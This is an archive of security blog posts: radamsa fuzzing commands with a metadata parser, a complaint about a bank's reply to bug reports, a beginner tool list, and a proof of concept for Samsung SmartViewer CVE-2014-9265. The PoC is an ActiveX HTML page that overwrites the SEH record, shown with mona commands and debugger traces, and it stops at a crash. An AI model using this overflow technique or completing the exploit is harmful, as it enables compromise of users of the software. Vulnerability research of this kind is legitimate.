Wednesday, January 28, 2015

Generate sample fuzz files using Radamsa Fuzzer

Radamsa is a general-purpose data fuzzer: it reads data from the given sample files and outputs modified, usually malformed, versions of that data.

The command below takes HTML files as input and generates an endless stream of malformed HTML files (press Ctrl+C to stop generating files). "-n 100000" would instead generate one lakh (100,000) malformed HTML files.

$ radamsa -o gen_htmls/test_browser_%n.html -n inf -r ../poc_html_files/*.html -M -

-o      specify where to write the modified data
%n      represents the test case number
-n      how many outputs to generate based on the sample(s); -1 or inf generates infinite output
-M -    write metadata about the generated data to the given path; - indicates stdout

"-M -" prints metadata like the following for each generated output file:
xp-repeat: 3, xp-dup: 1, xp-insert: 1, xp-swap: 1, muta-num: 1, source: "../poc_html_files/sample1.html", generator: file, nth: 31812, path: "gen_htmls/test_browser_31812.html", output: file-writer, length: 1622, pattern: burst
xp-repeat: 4, xp-dup: 2, xp-insert: 4, fuse-old: 1, muta-num: 4, source: "../poc_html_files/sample2.html", generator: file, nth: 31813, path: "gen_htmls/test_browser_31813.html", output: file-writer, length: 2515, pattern: many-dec
xp-repeat: 1, xp-pump: 1, xp-dup: 1, xp-insert: 5, muta-num: 1, source: "../poc_html_files/sample3.html", generator: file, nth: 31814, path: "gen_htmls/test_browser_31814.html", output: file-writer, length: 14832, pattern: burst
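
When a generated file later crashes the target, this metadata is what links the crash back to the source sample and the mutations applied to it. The following Python is an added example, not part of the original post or of radamsa itself; the two metadata lines embedded in it are copied from the output above as constructed input.

```python
import re

# Constructed sample: two records exactly as radamsa prints them with "-M -" (one per output file).
SAMPLE_METADATA = """\
xp-repeat: 3, xp-dup: 1, xp-insert: 1, xp-swap: 1, muta-num: 1, source: "../poc_html_files/sample1.html", generator: file, nth: 31812, path: "gen_htmls/test_browser_31812.html", output: file-writer, length: 1622, pattern: burst
xp-repeat: 4, xp-dup: 2, xp-insert: 4, fuse-old: 1, muta-num: 4, source: "../poc_html_files/sample2.html", generator: file, nth: 31813, path: "gen_htmls/test_browser_31813.html", output: file-writer, length: 2515, pattern: many-dec
"""

# key: value pairs separated by commas; values are either double-quoted (paths) or unquoted.
FIELD_RE = re.compile(r'([\w-]+):\s*("(?:[^"\\]|\\.)*"|[^,]+)')


def parse_metadata_line(line):
    """Turn one radamsa metadata line into a dict; numeric fields become ints."""
    record = {}
    for key, value in FIELD_RE.findall(line):
        value = value.strip()
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        elif value.lstrip('-').isdigit():
            value = int(value)
        record[key] = value
    return record


def parse_metadata(text):
    """Parse every non-empty line of captured "-M -" output."""
    return [parse_metadata_line(l) for l in text.splitlines() if l.strip()]


def mutations(record):
    """The mutation counters (xp-* / fuse-* keys) applied to one output file."""
    return {k: v for k, v in record.items() if k.startswith(("xp-", "fuse-"))}


def find_by_path(records, path):
    """Look up the record for a generated file, e.g. one that crashed the browser."""
    for r in records:
        if r.get("path") == path:
            return r
    return None
```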

praveend@praveend-VirtualBox:~/radamsa-0.4/bin/gen_htmls$
$ ls -t |more
test_browser_31816.html
test_browser_31814.html
test_browser_31815.html
test_browser_31813.html
test_browser_31812.html
test_browser_31811.html
test_browser_31810.html
test_browser_31808.html
test_browser_31809.html
test_browser_31807.html
test_browser_31806.html

$ radamsa -o :8080 -r gen_htmls/

The above command listens on port 8080 and binds to all IP addresses if the machine is multi-homed.
When a client connects to port 8080, radamsa serves the malformed files.

We can also use NodeFuzz to serve malicious HTML files, but NodeFuzz allows only one HTML file to be specified in its configuration. I am not sure how to respond with all the malicious files one by one when a client browser connects.
$ node nodefuzz.js

Enjoy Fuzzing!

Sunday, January 18, 2015

Hilarious reply from Kotak in response to reported Security Bugs

There are a few security issues on the Kotak Securities web site; I informed the folks at Kotak of my findings but got a surprising response.

This tells how serious Kotak is about their customers' data.

Below is the mail I got in response to reported security bugs.




Samsung SmartViewer BackupToAvi Remote Code Execution PoC (CVE-2014-9265)

This blog is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."

Let's load the single vulnerable DLL, C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll, into Immunity Debugger.

The mona plugin's help can be viewed with the command below; the two entries relevant here are shown:
!mona
           modules / mod        | Show all loaded modules and their properties
           unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow
The following command displays the list of all loaded modules and their properties (ASLR, SafeSEH, etc.):
!mona modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x774d0000 | 0x7754b000 | 0x0007b000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D    0x10000000 | 0x1017b000 | 0x0017b000 | False  | False   | False |  False   | False  | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D    0x75c60000 | 0x75d34000 | 0x000d4000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)

!mona ua
The above command generates venetian_alignment.txt in C:\Program Files\Immunity Inc\Immunity Debugger\

The mona command to search for pop/pop/ret address sequences:
!mona findwild -s "pop r32#*#pop r32#*#retn"
The above command generates findwild.txt, located at
C:\Program Files\Immunity Inc\Immunity Debugger\

Only one address (shown below) is Unicode-compatible and therefore useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)

A conditional breakpoint can be set as follows, assuming EIP holds 0x10008700 (although in practice EIP ends up holding 0x00100087):
bp 10008700 "j @eip=0x10008700 ; 'g' " 

Finding offset to EIP
Initially, pass a character string of length 15000 to the BackupToAvi API and use a Metasploit cyclic pattern to find the offset at which EIP is overwritten; in my case it is offset 156. To find the offset, execute !exchain, read the characters located at address 0x045ad62c, and look them up in the Metasploit cyclic pattern to get the offset.

Once we know the offsets to nSEH and SEH, we can write a PoC as shown below.
<html>
<head>
<title> PoC developed by Praveen Darshanam </title>
</head>
<body>
Samsung SmartViewer BackupToAvi Remote Code Execution
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' >
</object>

<script>
 var payload_length = 15000;
 var arg1 = 1;
 var arg2 = 1;
 var arg3 = 1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";
 var i, j;

 //offset to SEH is 156, initial analysis using metasploit cyclic pattern
 for (i = 0; i < 156; i++)
 {
  buf1 += "A";
 }

 var nseh = "DD";
 //address inside the vulnerable DLL
 var seh = "\x87\x10"; //pop, pop, ret
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j = 0; j < (payload_length - junk.length); j++)
 {
  buf2 += "B";
 }

 var fbuff = junk + buf2;
 target.BackupToAvi(arg1, arg2, arg3, fbuff);
</script>
</body>
</html>
When we open the above HTML file in the browser, we get the trace below
(tested on Windows 7 Ultimate N SP1 using Internet Explorer 8).

(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
00450045 ??              ???

0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044

0:005> d 045ad62c
045ad62c  44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00  D.D.E.E.B.B.B.B.
045ad63c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad64c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad65c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad66c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad67c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad68c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad69c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
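
From the defender's side, the shape of the PoC (the SmartViewer control instantiated through an <object> tag with its CLSID, and a script calling BackupToAvi on that object) is a usable detection signature for web content or proxy logs. The Python below is an added example, not from the original post; the two HTML fragments are constructed test inputs, and only the CLSID and method name come from the page.

```python
import re

# CLSID of the SmartViewer control instantiated by the PoC above.
SMARTVIEWER_CLSID = "208650B1-3CA1-4406-926D-45F2DBB9C299"

OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I)
# attribute name followed by a single-quoted, double-quoted or bare value
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
CALL_RE = re.compile(r"\b(\w+)\s*\.\s*BackupToAvi\s*\(", re.I)


def object_tags(html):
    """Map each <object> element id to its CLSID (upper-case, without the clsid: prefix)."""
    result = {}
    for m in OBJECT_RE.finditer(html):
        attrs = {}
        for name, v1, v2, v3 in ATTR_RE.findall(m.group(1)):
            attrs[name.lower()] = v1 or v2 or v3
        clsid = attrs.get("classid", "")
        if clsid.lower().startswith("clsid:"):
            clsid = clsid[6:]
        if clsid:
            result[attrs.get("id", "")] = clsid.upper()
    return result


def find_backuptoavi_calls(html):
    """Return the ids of SmartViewer <object>s on which a script calls BackupToAvi."""
    objs = object_tags(html)
    hits = []
    for m in CALL_RE.finditer(html):
        obj_id = m.group(1)
        if objs.get(obj_id) == SMARTVIEWER_CLSID and obj_id not in hits:
            hits.append(obj_id)
    return hits


# Constructed test inputs: a PoC-shaped page, and a page that embeds the control without calling it.
POC_LIKE = """<object classid='clsid:208650b1-3ca1-4406-926d-45f2dbb9c299' id='target'></object>
<script>var buf = "A".repeat(15000); target.BackupToAvi(1, 1, 1, buf);</script>"""
BENIGN = """<object classid="clsid:208650B1-3CA1-4406-926D-45F2DBB9C299" id="viewer"></object>
<script>viewer.Connect();</script>"""
```

A static check like this only sees literal calls; a dynamic harness such as the radamsa-fed browser setup described in the earlier post is still needed to observe the crash itself.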

I couldn't write a working exploit because of the issues mentioned below.
Issue 1:
None of the registers point to the controlled buffer at the time of the crash; this can be verified using "d reg_name" on the WinDbg CLI, where reg_name might be eax, ebx, esp, edi, etc.

var nseh = "DD";
var seh = "\x87\x10";      //0x10008700
045ad62c  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.

Issue 2:
0x10008700 points to a pop/pop/ret, but EIP gets 0x00100087 instead of 0x10008700.

I am facing Issue 2 on Windows XP Pro SP3 as well:
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00  D.D.....B.B.B.B.
020bf7a8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7b8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7c8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7d8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7e8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7f8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf808  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

Any hints to develop working exploit are most welcome!

Monday, January 12, 2015

Network Security Testing for Absolute Beginners


This blog covers some tools for Network/Security Testing.

Packet Crafting - hping, ngrep, sendip, scapy
Packet Replay - tcpreplay, tcpreplay-edit, tcpdump
Scanning - nmap, nc, metasploit, nessus
Fuzzing - metasploit, nikto, nessus, spike, radamsa, webfuzz
Stats - dstat, ifstat, iftop, ntop
Web - wget, curl, ab
Debugging - ping, netstat, tracert, ngrep
Benchmarking - ab, iperf, netperf
SNMP - snmpwalk
NTP Suite

For CLI one-liners, refer to the presentation below:
http://disects.com/whitepapers/NetworkSecurityTestingTools.pdf